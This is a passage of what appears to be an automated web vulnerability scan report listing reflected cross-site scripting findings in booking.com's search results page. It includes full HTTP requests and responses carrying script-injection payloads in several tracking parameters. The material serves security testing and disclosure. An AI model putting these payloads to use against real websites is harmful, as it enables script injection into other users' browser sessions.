Date: Mon, 03 Oct 2011 00:23:40 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR5vMROsGtdOqni7xd6cAoVKhb9Ewrb6Lle4B6NIh%2BeUKFpHaVQ7I%2Bv2i0aU%2BoaHw1r6PzmyXv7KVvGiCgLVPhQ6xPTakka1dxZQ6DCxQDenu2rKiqZKZqtvOkBYMROrZcYscHarlS0s7caQOq7nq3HKgynVWmhc%2BlY9pf305Cjlkerg4Jj4TrEqt5zC5NpPTYEVlGB5UYVzGTjsTFsmoa7rApNujeJYw4vDthwNtsu59UJvV3LjvWDEZewz6nel%2FZG7MFWiCdIGDAqj%2FQBsJcNs3TgR0Le%2FZGj3AM5pahsQ3D%2FFFqALqSexi2UskddoQI988xx9RagbWgNdS5914aH%2BxwZIVj9Yzrl2u2UahUdOMNE67j0Wpg9USYE7BCx7x5gw5jRq3gkyGDsHs7X5azsE6gd4YxBgrcvmk6%2FwQ4myyDPMdDBRookjmYUSevnUnEGrE2aRLJqPWUC5Y01RreLHG8HcAiM%2Frep%2BhvtHxIF1BO1wi10seHEIB4bku1IYb9BvGWLMpEE%2BoQoYfTDQqssblitzzammcyZB7ROio8UMprtvtuFzqAF%2FAPIeuXdOjr79OojBGEDzmIRvOqAr%2FzHqjHqwH8vybt8jm%2BwghUUXTyYb%2BkcSrMcftFJTKdV6wMBm6e1DdZXRZoLtm%2F6RaIpTpUL7mqF5SZaYa9iLTDtkdE0INDYPnz4l%2F3doDwLsb6htopKghBmiUNuMgnVRkK1bIGQATiYxOf3YEk6E6hTmrzINROFan7tNgw%2BgpKScZ%2FOBucZ%2FC5yPObCPdfvgfGkTPt11Jval%2FBWy8sHblLazlePrycG7KtE7LG5qYZ5I9Act%2FNJfFQ3zu7WFjb61FerlqV3%2FFpUKixv26VQQ%2FfPxquPe7nn56jZrp9vEXPPoCPlrJv0Ryp95KQUfr3A4eOEu9ZzvmgPAMEQo7lGdth0WBOHc0k9KCymkhyxM6%2B4Mtg7%2Ff2ban4VPW%2B%2FmqCHrImkQNggAXbUB4BrkuEhTuMQkltBEy54S0UkvNg0GKvwS85JnKW6XaO0aeZU6xW0rrA%2FcBMf8fiEw1yJx7%2FhlklXCvXJQ02%2FV5wkThSA8rMWwsAOXZNPtv2miewev8XywH2B%2Fq1j1fe%2FH9L6q8CJ%2BrJ%2Ba7z%2FJmSKwuTK%2BR6Hb%2FcE2ZBB%2FshMe57V5AOO%2B41V1bFbRECurpEBVkK%2BED26jLqJ6z8bl%2Fsk8L7ijEFOOALX6%2F7YKGWm1srlHPCpvUI5nspeIKlsTTmri23%2FL4222e2PEt2lMwkgoGqpgURE6qpexWMCDA2E6BRDvxmw8ZKCeK%2BSzEHzEWZToeTN0Ts8wdUGrPs39rNHZuwKKDlRQ5nsy3mwS7JO8wOYxiVmVLTQgGBDGO02pnt85NjEBTiAun69wP%2BVRLYYOShIgYyUOGgVDsThfMmtpdNCwxeobrdNWu4ItGJ6pVZisVgQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:41 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391878
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC32e1c'-alert(1)-'2f7b3175511;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_all_xxxx_rooms = 'XXXX more room types';



...[SNIP]...

4.231. http://www.booking.com/searchresults.html [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 344aa"><script>alert(1)</script>815550adb7c was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC344aa"><script>alert(1)</script>815550adb7c&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:28 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR5vMROsGtdOqni7xd6cAoVKhb9Ewrb6Lle4B6NIh%2BeUKFpHaVQ7I%2Bv2i0aU%2BoaHw1r6PzmyXv7KVvGiCgLVPhQ6xPTakka1dxZQ6DCxQDenu2rKiqZKZqtvOkBYMROrZcYscHarlS0s7caQOq7nq3HKgynVWmhc%2BlY9pf305Cjlkerg4Jj4TrEqt5zC5NpPTYEVlGB5UYVzGTjsTFsmoa7rApNujeJYw4vDthwNtsu59UJvV3LjvWDEZewz6nel%2FZG7MFWiCdIGDAqj%2FQBsJcNs3TgR0Le%2FZGj3AM5pahsQ3D%2FFFqALqSexi2UskddoQI988xx9RagbWgNdS5914aH%2BxwZIVj9Yzrl2u2UahUdOMNE67j0Wpg9USYE7BCx7x5gw5jRq3gkyGDsHs7X5azsE6gd4YxBgrcvmk6%2FwQ4myyDPMdDBRookjmYUSevnUnEGrE2aRLJqPWUC5Y01RreLHG8HcAiM%2Frep%2BhvtHxIF1BO1wi10seHEIB4bku1IYb9BvGWLMpEE%2BoQoYfTDQqssblitzzammcyZB7ROio8UMprtvtuFzqAF%2FAPIeuXdOjr79OojBGEDzmIRvOqAr%2FzHqjHqwH8vybt8jm%2BwghUUXTyYb%2BkcSrMcftFJTKdV6wMBm6e1DdZXRZoLtm%2F6RaIpTpUL7mqF5SZaYa9iLTDtkdE0INDYPnz4l%2F3doDwLsb6htopKghBmiUNuMgnVRkK1bIGQATiYxOf3YEk6E6hTmrzINROFan7tNgw%2BgpKScZ%2FOBucZ%2FC5yPObCPdfvgfGkTPt11Jval%2FBWy8sHblLazlePrycG7KtE7LG5qYZ5I9Act%2FNJfFQ3zu7WFjb61FerlqV3%2FFpUKixv26VQQ%2FfPxquPe7nn56jZrp9vEXPPoCPlrJv0Ryp95KQUfr3A4eOEu9ZzvmgPAMEQo7lGdth0WBOHc0k9KCymkhyxM6%2B4Mtg7%2Ff2ban4VPW%2B%2FmqCHrImkQNggAXbUB4BrkuEhTuMQkltBEy54S0UkvNg0GKvwS85JnKW6XaO0aeZU6xW0rrA%2FcBMf8fiEw1yJx7%2FhlklXCvXJQ02%2FV5wkThSA8rMWwsAOXZNPtv2miewev8XywH2B%2Fq1j1fe%2FH9L6q8CJ%2BrJ%2Ba7z%2FJmSKwuTK%2BR6Hb%2FcE2ZBB%2FshMe57V5AOO%2B41V1bFbRECurpEBVkK%2BED26jLqJ6z8bl%2Fsk8L7ijEFOOALX6%2F7YKGWm1srlHPCpvUI5nspeIKlsTTmri23%2FL4222e2PEt2lMwkgoGqpgURE6qpexWMIS389g8%2F8mZI8lwWGE9JksdaLbXuVy9N3SCRjLVKcjXf9SwBm%2FyUAPg%2FDHVvRr496Vy1mwhjyryHxJpGrf9UUt4kvnV3TiKnD0AXB0L05Tdyrgx18h6JceMtd7UHLp6b4odk3WLeoEiy7YIzluKXRP4yeiIYXMRLw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:29 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391937
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC344aa"><script>alert(1)</script>815550adb7c;utm_source=igougo;utm_term=ufi-P20061717" />
...[SNIP]...

4.232. http://www.booking.com/searchresults.html [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f430'-alert(1)-'dcfb36c82fd was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo7f430'-alert(1)-'dcfb36c82fd&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:23 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbj%2Ba5CAQ3Uz9eoVzkg70RpUFnm2042B3579UQ5qP3P7oyaegNlsgBKG2atnlnur6lQD5U81gNSkzLpiXUksnHO6av8%2BLst085XwnjXOfYTCWcbO90%2F4qY%2FsRIUfwTkUnoph%2BhMfg98dxBkWo5n3wBCMhREl%2BoFiUHpmPWZoKMSu2CGJqkFgh6Qyzkt3Fynk%2BzW3IIDOekD6joY%2BkOYS03WztSmYe8pVB8yJWleX9eG4ATiTPwq96PvrdXBQVFVpmCh4o7z%2BNQz4l6S%2FZN%2FDBN6PFKB0lnSmOK%2FurEG8Ml9t5J%2BOB9iyNiyyv864%2Flvm2oCMbdGTmbuTnQFj2zwpKCbmBRtF2ZFq27xHJphwAgEc87%2F%2Fc%2B4mi9mxehEBK9lAu3%2Bzlfdh7GhBrdTN4hBqs195CVMU%2Fjg6flqyX%2BeoPT4vap4DwsZ12ywkq98%2FzLUVi4UeF9LufGigU%2FOcuRo2wfkRVGmdRtL08sk%2BxMTmyNwmoXUFl40nkUrs4IQAzlpDbNfQCrlmIlSeU3BbP5JV%2Bqoj8UgSIFWbzVr7IOjAZzXScX29Zx%2BpqAegU2cw7Tm7OFWISMkaTjj3v%2FPF%2Bl41xMbU0%2FmfXff9XL1Y5FUxfNXdN1urxpyXvj8Y2PKF58e%2F7Ud%2BW4odd%2FPY5Iifl29x9reql5nJEDX4d6poDXaOzJud8kXMAsXx6%2BbeT1SNTnr%2BGxI0V8chLr06l051XSRzVFV3dqlNTZsWCa1OnYD9ZPIocwO2S0y%2Fs1TCxz1R7Q0S3s3%2BTG3cDvNkQZ8ozps9W83F9BlkOmw9g6hwymySWy3v0eMQWJ85zs1KtYKAAeqhQownd0n1%2FYiJ%2Bx6%2B3tDOsltm60cGci9%2BVkovckZo%2B8cKLLnkY0eP6Ea0KVP6JCXqorsd2ZUf865qw%2Fg3DoGwDvObWO4E%2F%2FNzNnJE%2BTk7wsFE7A0KS0VRYsRkild6STDy95%2F5Z0fnyfGZY9Q%2F1chJ7B2%2Bh1IjHNnEAOc786LN3S%2FGEpzAlBTkH4O2I1Ov7hj9YoEWIcrR%2FiRzfs%2BSA9vJLzu6IEH22ffmtK2DhPufZGShGOegaU2Kc%2Be1xB7Mdgqqkd3jKxDXugL3jzFC%2BlTFJ05OdVPMp2G4bInwOOfUw1bEoB20w5jhLYYo2qr%2FuF4cw8%2F%2F0baMQ3A7t6QW%2BZLuQmfQqLPggXBBtNtTns3ylFZVHgjVujZvDlb6hq2HJOrmVzzt4GZ2s9bhCKLcegAC91TLIQTbsxgsoMWLwNBmwrRm2pyVMo6BYIxsnXRQ5fq1NvHKekqZufmd3x4sq0uidrPjcitUPafqefdYi%2FI9vnlT4uppop07S0y9hnYvL41OGimvbcu6xn7rYpM89AxhcZPisir6Fi6vcZmO6B9Z0CmUP9tt4YzzhPvmrOzAywUPwbmeMGKz0RTfXDmNrJ0No0pVAEClHHHLs4A%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:24 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391878
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
= [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo7f430'-alert(1)-'dcfb36c82fd;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_all_xxxx_rooms = 'XXXX more room types';


booking.env.group_
...[SNIP]...

4.233. http://www.booking.com/searchresults.html [utm_source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5cb2"><script>alert(1)</script>27c39c43203 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougof5cb2"><script>alert(1)</script>27c39c43203&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:09 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDWgwOhJxwg7m3%2FTm%2Bpe85rxz59CV0EgvxyeGT10beFZZcogoAsj2MaENn2KYaVZ1r0fFhSxmgUylhAQt7UHQtXRDja87uWC2XXI%2BUDMC6X3dhBduLLDaw4dqw%2FUS9hvrqfZ7Ir7BDuwlhH6su0%2BN1ni7MLD987AnAKzveI%2BGPFecjvy%2BPfJPYInweihYYq9LUaqT0z8BhwTIpQjiGKS8nijdL3YrStO2nyK2bmgtOCxOYxj8ozNDOeF6l%2BtuhiV4%2BrMtjCX2chT4vgMvL3CCCKCpgyqK%2F3F0lA4PfO55WiXGWWLLjlI1NMj8KHbtT1QK7Q%2FvbaYowTCAAeM6%2F%2BDWHhxIqHgvgRh9e44TQUjX6yLYQgjPs7RB7Zfz4ctl%2FlW0PRajbcq1Dh6rgqORADVMYgTMHxguwfPH64VqZHYpOLkzLfWeb2wvch2j8SnQPjCrUzYZX4sYOZwdbGQc7X9c37G%2FjdV5qLmD12VfnFIWvYp2fcIK8J8zRpYJ5WI72sZyBAseMq%2Fjz32f6IMsrr1tJYqbaRXD3owjsjRVq06bFkKKc9g%2FwfD0Rsxade%2BoJVHQmKyJ4PtVpfWke4w2S5xY1x0%2Fn4gbRSPaCbwTiTomT7L5D540lQJtMFC9NxrfmsZTAeXZ2HrSfc9%2Byz7RII%2BvCXMvKMVFreSS9PJtEP9L8O868P70OeCEo1ql%2FWYsK9Da%2FaxjtETkYSxWsjXyQLuQv7hDlKq7A2qBwL1JYkJzZ4ffNjVBx9xeThFFTEbuBnh2I3KWnnmJfEdvbryR1efGrN5J%2FK5WuDMxD75hf%2FCw8HLZqsFLPhGVLPBhQQ%2FCaqyxhS9Q0EMfNOJOpYIHRgE1jDQ15Z48XV4QnMvZSmVIFqwwaKGvWyO7CNQHvUTRPCJFYlroctDFvEXFsV2m7mSELrLHBgKyHKoZ8R98I8jR1Qp5TBoFV3bFM9HKLe1yM%2BKQTGSpE%2BBhMdZMBUyEvJniLXpGj4DMerhqxmiZKoROPtFcjiCcoBnkzb8Dmne9%2FXCBq02qqx8vabR799Rg%2FjqiiNjfM9kdzq6hJ5F5w8Uuer0VYZnX%2FTKw1XwRPtXqtql5k8B%2BbxCYmuqG0j0xI5e5ww%2FgkmQnSMUOi9d9GaN%2F4kFQUduhstV4uD11A2l8%2BOFya8Kcuth13fqnrdZMzp4Lfi2bunXSvjnMS4D0O9RlWrmIy5f32rMML1SMUyTAVlVMguldjgSxxr4vDY5ep76bodfWdplXNw4BGmweJ43xXpuBNQVymNqizGykoqSBm88eh6SLIuGv%2Fl8EiaJDay%2FZZhk%2FrzK3TRJjTJ%2Bp31g2Oy%2BrmgXT2w%2BW%2FIYEv97oAMSmwQzw9fFOkDHaAf4tJEgxWSbFbWCn4m1W1io5t3tMuHwTvNd2sv6OTYP5hOJfBGzPTiGLrqI9%2FTFTKmWX3rUYnVM0KyUNgNKY9t16hKs9dpqMLCCEWb6xyhw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:10 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391937
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougof5cb2"><script>alert(1)</script>27c39c43203;utm_term=ufi-P20061717" />
...[SNIP]...

4.234. http://www.booking.com/searchresults.html [utm_term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_term request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a141a'-alert(1)-'2eed708b64a was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717a141a'-alert(1)-'2eed708b64a HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:15 GMT
Server: Apache
